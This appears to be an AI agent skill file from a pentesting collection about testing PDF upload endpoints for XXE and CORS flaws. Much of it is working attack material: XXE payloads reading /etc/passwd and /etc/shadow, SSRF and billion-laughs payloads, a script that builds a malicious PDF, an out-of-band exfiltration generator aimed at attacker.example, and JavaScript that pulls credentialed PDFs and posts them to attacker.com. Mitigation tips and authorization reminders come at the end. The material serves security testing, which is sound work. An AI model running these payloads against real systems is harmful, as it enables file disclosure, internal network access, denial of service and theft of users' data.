Hacktricks-skills pdf-upload-xxe-cors-bypass
How to test PDF upload endpoints for XXE (XML External Entity) injection and CORS bypass vulnerabilities. Use this skill whenever you're pentesting file upload functionality, especially PDF uploads, or when investigating XXE injection vectors through file parsing. Make sure to use this skill when the user mentions PDF uploads, file upload vulnerabilities, XXE injection, CORS misconfigurations, or any file parsing security testing.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass/SKILL.MD
PDF Upload - XXE and CORS Bypass Testing
This skill helps you identify and exploit XXE (XML External Entity) injection vulnerabilities and CORS bypass issues in PDF upload endpoints.
Understanding the Vulnerabilities
XXE in PDF Uploads
PDF files can embed XML, most commonly XMP metadata packets and XFA form data. When a server passes that XML to a parser that still has DTD and external entity processing enabled, an uploaded PDF can trigger entity resolution, leading to:
- Local file disclosure - Reading files from the server filesystem
- SSRF - Making requests to internal services
- RCE - In some cases, remote code execution
- DoS - Billion laughs attack via entity expansion
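Before sending payloads, it can help to confirm that a given PDF actually carries XML. The sketch below scans raw bytes for a few markers; the marker list and the `find_xml_markers` name are illustrative assumptions, and XML inside compressed streams will not be found this way.

```python
import re

# Byte patterns that commonly indicate XML inside a PDF.
# Assumed, non-exhaustive list; compressed streams are not inspected.
XML_MARKERS = {
    "xmp_packet": rb"<\?xpacket\b",
    "xmp_meta": rb"<x:xmpmeta\b",
    "xfa_form": rb"/XFA\b",
    "doctype": rb"<!DOCTYPE\b",
    "entity_decl": rb"<!ENTITY\b",
}


def find_xml_markers(pdf_bytes: bytes) -> list[str]:
    """Return the names of the XML-related markers present in the raw bytes."""
    return [
        name
        for name, pattern in XML_MARKERS.items()
        if re.search(pattern, pdf_bytes)
    ]


if __name__ == "__main__":
    with open("target.pdf", "rb") as handle:  # hypothetical file name
        print(find_xml_markers(handle.read()))
```

A hit on `doctype` or `entity_decl` in a file you did not craft yourself is worth a closer look, since ordinary XMP packets rarely declare entities.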
CORS Bypass in PDF Uploads
CORS (Cross-Origin Resource Sharing) misconfigurations can allow:
- Cross-origin PDF access - Reading PDFs from other domains
- Credential theft - Accessing authenticated PDF content
- Data exfiltration - Extracting sensitive information from PDFs
Testing Methodology
Step 1: Identify PDF Upload Endpoints
Look for endpoints that accept PDF files:
```bash
# Find upload endpoints
grep -r "upload" /path/to/app/
grep -r "\.pdf" /path/to/app/

# Check for file upload forms
curl -I https://target.com/upload | grep -i "content-type"
```
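When only the rendered pages are available rather than the source tree, upload forms can be located by parsing the HTML. This is a minimal sketch using the standard library; `FileInputFinder` and `find_file_inputs` are hypothetical helper names, and forms built dynamically by JavaScript will not be seen.

```python
from html.parser import HTMLParser


class FileInputFinder(HTMLParser):
    """Collect <input type="file"> elements together with their form action."""

    def __init__(self):
        super().__init__()
        self.current_action = None
        self.found = []  # tuples of (form action, input name, accept attribute)

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "form":
            self.current_action = attributes.get("action", "")
        elif tag == "input" and (attributes.get("type") or "").lower() == "file":
            self.found.append(
                (self.current_action, attributes.get("name"), attributes.get("accept"))
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self.current_action = None


def find_file_inputs(html: str):
    """Return every file input found in the given HTML text."""
    finder = FileInputFinder()
    finder.feed(html)
    return finder.found
```

An `accept` value such as `application/pdf` or `.pdf` is a hint that the endpoint expects PDFs, although the server may accept other types as well.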
Step 2: Test for XXE Injection
Create a Malicious PDF with XXE Payload
PDF files can embed XML content. Create a test PDF with embedded XXE:
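```python
# scripts/create-xxe-pdf.py
import fitz  # PyMuPDF

# XML metadata carrying a DOCTYPE with an external entity.
# Assumption: the target passes document metadata to an XML parser.
XXE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x:xmpmeta [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/">&xxe;</x:xmpmeta>
"""


def create_xxe_pdf(output_path):
    doc = fitz.open()
    page = doc.new_page()

    # Add visible text so the file renders as an ordinary PDF
    page.insert_text((72, 72), "Test PDF for XXE")

    # Store the payload as the document's XML metadata stream
    doc.set_xml_metadata(XXE_XML)

    # Save the PDF
    doc.save(output_path)
    doc.close()
    print(f"Created: {output_path}")


if __name__ == "__main__":
    create_xxe_pdf("xxe_test.pdf")
```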
XXE Payloads to Test
Basic XXE Payload:
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
```
File Read Payload:
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<foo>&xxe;</foo>
```
SSRF Payload:
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal-service:8080/admin"> ]>
<foo>&xxe;</foo>
```
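A general entity is only resolved when its declaration sits inside a `DOCTYPE` and the document body references it as `&name;` (the `%name;` form is reserved for parameter entities declared with `<!ENTITY % name ...>`). The helper below is a small sketch that wraps any target URI in a well-formed document; the function name and the default root element `foo` are assumptions for illustration.

```python
def build_xxe_document(system_uri: str, root: str = "foo") -> str:
    """Return a well-formed XML document whose body references an external entity."""
    if '"' in system_uri:
        raise ValueError("system_uri must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'  <!ENTITY xxe SYSTEM "{system_uri}">\n'
        "]>\n"
        f"<{root}>&xxe;</{root}>\n"
    )


if __name__ == "__main__":
    for uri in ("file:///etc/passwd", "http://internal-service:8080/admin"):
        print(build_xxe_document(uri))
```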
Billion Laughs (DoS):
```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<lolz>&a;</lolz>
```
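To see why nested entities are a denial-of-service risk, it helps to compute how large the expansion becomes. The sketch below does the arithmetic for a five-level chain with ten references per level; the 32-character leaf value is an assumption chosen for the example, and `expanded_length` is a hypothetical helper that does not guard against cyclic definitions (which XML forbids anyway).

```python
import re

ENTITY_REF = re.compile(r"&(\w+);")


def expanded_length(definitions, name, cache=None):
    """Return the character count of entity `name` after full expansion."""
    cache = {} if cache is None else cache
    if name not in cache:
        value = definitions[name]
        literal = len(ENTITY_REF.sub("", value))  # characters that are not references
        nested = sum(
            expanded_length(definitions, ref, cache)
            for ref in ENTITY_REF.findall(value)
        )
        cache[name] = literal + nested
    return cache[name]


# Five levels, ten references each, assumed 32-character leaf.
LEVELS = {
    "a": "&b;" * 10,
    "b": "&c;" * 10,
    "c": "&d;" * 10,
    "d": "&e;" * 10,
    "e": "A" * 32,
}

if __name__ == "__main__":
    print(expanded_length(LEVELS, "a"))  # 10**4 * 32 characters
```

Each extra level multiplies the result by ten, so a payload of a few hundred bytes can demand gigabytes of memory from a parser that expands entities without limits.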
Step 3: Test CORS Configuration
Check CORS Headers
```bash
# Test CORS headers on PDF endpoint
curl -I -H "Origin: https://evil.com" https://target.com/api/pdf/upload

# Check for overly permissive CORS (a wildcard only appears in responses,
# so probe with the null origin instead)
curl -I -H "Origin: null" https://target.com/api/pdf/upload

# Test with different origins
curl -I -H "Origin: https://attacker.com" https://target.com/api/pdf/upload
```
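The same probe can be scripted when several origins need to be tried. This is a rough sketch using only the standard library; it mirrors `curl -I` by sending a `HEAD` request, and the function names are assumptions made for this example.

```python
import urllib.error
import urllib.request


def build_cors_probe(url: str, origin: str) -> urllib.request.Request:
    """Build a HEAD request that carries the given Origin header."""
    return urllib.request.Request(url, method="HEAD", headers={"Origin": origin})


def fetch_cors_headers(url: str, origin: str, timeout: float = 10.0) -> dict:
    """Send the probe and return only the Access-Control-* response headers."""
    request = build_cors_probe(url, origin)
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            headers = response.headers
    except urllib.error.HTTPError as error:
        headers = error.headers  # error responses can still carry CORS headers
    return {
        key.lower(): value
        for key, value in headers.items()
        if key.lower().startswith("access-control-")
    }


if __name__ == "__main__":
    for origin in ("https://evil.com", "null", "https://attacker.com"):
        print(origin, fetch_cors_headers("https://target.com/api/pdf/upload", origin))
```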
Common CORS Misconfigurations
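| Header | Vulnerable Value | Risk |
|---|---|---|
| `Access-Control-Allow-Origin` | `*` | High - allows any origin |
| `Access-Control-Allow-Origin` | Reflected origin | Medium - reflects attacker's origin |
| `Access-Control-Allow-Credentials` | `true` with a reflected origin | Critical - allows credentialed reads from any origin (browsers reject `true` combined with `*`) |
| `Access-Control-Allow-Methods` | `*` | Medium - allows all HTTP methods |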
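The checks in the table can be applied mechanically to a set of response headers. The following is a sketch, not a complete scanner: the finding labels and the `classify_cors` name are invented for illustration, and it only compares the echoed origin against the one that was sent.

```python
def classify_cors(headers: dict, sent_origin: str) -> list[str]:
    """Return labels for the misconfigurations visible in the response headers."""
    normalized = {key.lower(): value.strip() for key, value in headers.items()}
    allow_origin = normalized.get("access-control-allow-origin", "")
    allow_credentials = (
        normalized.get("access-control-allow-credentials", "").lower() == "true"
    )
    allow_methods = normalized.get("access-control-allow-methods", "")

    findings = []
    if allow_origin == "*":
        findings.append("wildcard-origin")
    elif allow_origin and allow_origin == sent_origin:
        findings.append("reflected-origin")
    # Credentials only matter with a specific origin; browsers refuse "*" here.
    if allow_credentials and allow_origin and allow_origin == sent_origin:
        findings.append("credentialed-cross-origin")
    if allow_methods == "*":
        findings.append("wildcard-methods")
    return findings
```

A `reflected-origin` finding is only meaningful if the origin you sent is one the application should not trust, so probe with a domain you control rather than the site's own origin.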
Step 4: Exploitation Techniques
XXE Exploitation
- File Disclosure:

  ```bash
  # Upload malicious PDF and check response
  curl -X POST https://target.com/upload \
    -F "file=@malicious.pdf" \
    -v | grep -i "root:"  # Check for /etc/passwd content
  ```

- SSRF:

  ```bash
  # Monitor for internal requests
  # Check if internal services are accessible
  curl -X POST https://target.com/upload \
    -F "file=@ssrf-pdf.pdf"
  ```

- Out-of-Band Data Exfiltration:

  ```bash
  # Set up listener
  nc -lvnp 4444

  # Upload PDF with XXE pointing to your server
  curl -X POST https://target.com/upload \
    -F "file=@oob-pdf.pdf"
  ```
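Out-of-band exfiltration is usually done with parameter entities and an external DTD hosted on the tester's server, because the file content has to be spliced into a URL. The sketch below generates both pieces; `build_oob_payload`, the `/collect?d=` path, and the `evil.dtd` file name are assumptions for illustration. The DTD must be served over HTTP from the callback host, which a bare `nc` listener will not do on its own.

```python
# External DTD: read the file, then build a second entity whose URL carries it.
DTD_TEMPLATE = (
    '<!ENTITY % file SYSTEM "file://{path}">\n'
    '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{base}/collect?d=%file;\'>">\n'
    "%eval;\n"
    "%exfil;\n"
)

# Document embedded in the PDF: it only pulls in the external DTD.
DOCUMENT_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [ <!ENTITY % ext SYSTEM "{base}/{dtd_name}"> %ext; ]>\n'
    "<foo/>\n"
)


def build_oob_payload(callback_base: str, target_file: str, dtd_name: str = "evil.dtd"):
    """Return (document, external_dtd) for an out-of-band XXE attempt."""
    base = callback_base.rstrip("/")
    document = DOCUMENT_TEMPLATE.format(base=base, dtd_name=dtd_name)
    external_dtd = DTD_TEMPLATE.format(base=base, path=target_file)
    return document, external_dtd


if __name__ == "__main__":
    doc, dtd = build_oob_payload("http://attacker.example:4444", "/etc/hostname")
    print(doc)
    print(dtd)
```

Single-line files such as `/etc/hostname` are the most reliable targets, since many parsers refuse URLs that contain newlines.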
CORS Bypass Exploitation
- Cross-Origin PDF Access:

  ```html
  <!-- scripts/cors-test.html -->
  <script>
  fetch('https://target.com/api/pdf/protected.pdf', {
    method: 'GET',
    mode: 'cors',
    credentials: 'include'
  })
    .then(response => response.blob())  // PDFs are binary, so read as a blob
    .then(data => {
      // Send to attacker server
      fetch('https://attacker.com/collect', {
        method: 'POST',
        body: data
      });
    });
  </script>
  ```

- Credential Theft:

  ```javascript
  // If CORS allows credentials, authenticated requests work
  fetch('https://target.com/api/pdf/user-data.pdf', {
    credentials: 'include'  // Sends cookies
  });
  ```
Step 5: Verification and Reporting
XXE Verification Checklist
- Server processes XML entities in PDF content
- File read payloads return expected content
- SSRF payloads reach internal services
- DoS payloads cause resource exhaustion
- Error messages reveal parsing details
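Matching on the string `root:` alone can produce false positives, for example from error messages. A stricter check, sketched below, looks for a full seven-field passwd entry; the regular expression and the `looks_like_passwd` name are assumptions for this example.

```python
import re

# name:password:uid:gid:gecos:home:shell, one entry per line
PASSWD_LINE = re.compile(
    r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$",
    re.MULTILINE,
)


def looks_like_passwd(body: str) -> bool:
    """Return True when the response body contains a passwd-style line."""
    return PASSWD_LINE.search(body) is not None
```

Save the full response alongside the verdict so the finding can be reproduced in the report.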
CORS Verification Checklist
- Access-Control-Allow-Origin is not `*`
- Origin is not reflected in response
- Credentials are not allowed with wildcard origin
- Sensitive PDFs are not accessible cross-origin
- CORS preflight requests are properly validated
Common Tools
PDF Manipulation
```bash
# Install PyMuPDF
pip install pymupdf

# Create test PDFs
python scripts/create-xxe-pdf.py

# Inspect PDF structure
pdfinfo target.pdf
```
CORS Testing
```bash
# Use curl for manual testing
curl -I -H "Origin: https://evil.com" https://target.com/api/pdf

# Use browser DevTools
# Check Network tab for CORS headers
```
Automated Scanning
```bash
# Check for XXE in file upload
nuclei -u https://target.com/upload -t xxe.yaml

# Check CORS configuration
nuclei -u https://target.com/api/pdf -t cors.yaml
```
Mitigation Recommendations
For XXE
- Disable XML entity processing in PDF parsers
- Validate file content - ensure uploaded files are actually PDFs
- Use allowlists for permitted file types
- Sanitize input before processing
- Run parsers in sandboxed environments
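One way to approximate "disable entity processing" when the XML is extracted and parsed in Python is to reject any document that declares a `DOCTYPE` at all. The sketch below uses the standard library's expat bindings; `DTDForbidden` and `is_safe_xml` are hypothetical names, and how to disable DTDs in a real PDF library depends on that library's own configuration.

```python
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when the XML declares a DOCTYPE."""


def parse_rejecting_dtd(xml_bytes: bytes) -> None:
    """Parse the XML and abort as soon as a DOCTYPE declaration starts."""
    parser = expat.ParserCreate()

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.Parse(xml_bytes, True)


def is_safe_xml(xml_bytes: bytes) -> bool:
    """Return False for XML that is malformed or declares a DOCTYPE."""
    try:
        parse_rejecting_dtd(xml_bytes)
    except (DTDForbidden, expat.ExpatError):
        return False
    return True
```

Because entities can only be declared inside a DTD, refusing the `DOCTYPE` blocks file reads, SSRF, and entity-expansion payloads in one step.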
For CORS
- Set specific origins instead of `*`
- Don't reflect origin in response headers
- Disable credentials when using wildcard origin
- Validate preflight requests
- Use SameSite cookies for additional protection
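The first two points amount to comparing the request's `Origin` against an exact-match allowlist rather than echoing it. A minimal server-side sketch follows; the allowlist entry and the `cors_headers_for` name are hypothetical, and a real application would wire this into its framework's response handling.

```python
# Hypothetical allowlist; exact string matches only, no patterns or suffix checks.
ALLOWED_ORIGINS = frozenset({"https://app.example.com"})


def cors_headers_for(origin, allowed=ALLOWED_ORIGINS) -> dict:
    """Return the CORS response headers for a request with the given Origin."""
    headers = {"Vary": "Origin"}  # keep caches from mixing per-origin responses
    if origin is not None and origin in allowed:
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers
```

Unknown origins, including the literal string `null`, receive no `Access-Control-Allow-Origin` header, so the browser blocks the cross-origin read.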
Example Workflow
```bash
# 1. Create test PDF with XXE payload
python scripts/create-xxe-pdf.py

# 2. Upload and test for XXE
curl -X POST https://target.com/upload \
  -F "file=@xxe_test.pdf" \
  -v

# 3. Check CORS headers
curl -I -H "Origin: https://evil.com" \
  https://target.com/api/pdf/upload

# 4. Analyze response for vulnerabilities
# 5. Document findings and recommend fixes
```
Important Notes
- Always get authorization before testing file upload vulnerabilities
- Test in isolated environments to avoid impacting production
- Document all findings with evidence and reproduction steps
- Follow responsible disclosure when reporting vulnerabilities
- Consider business impact when prioritizing remediation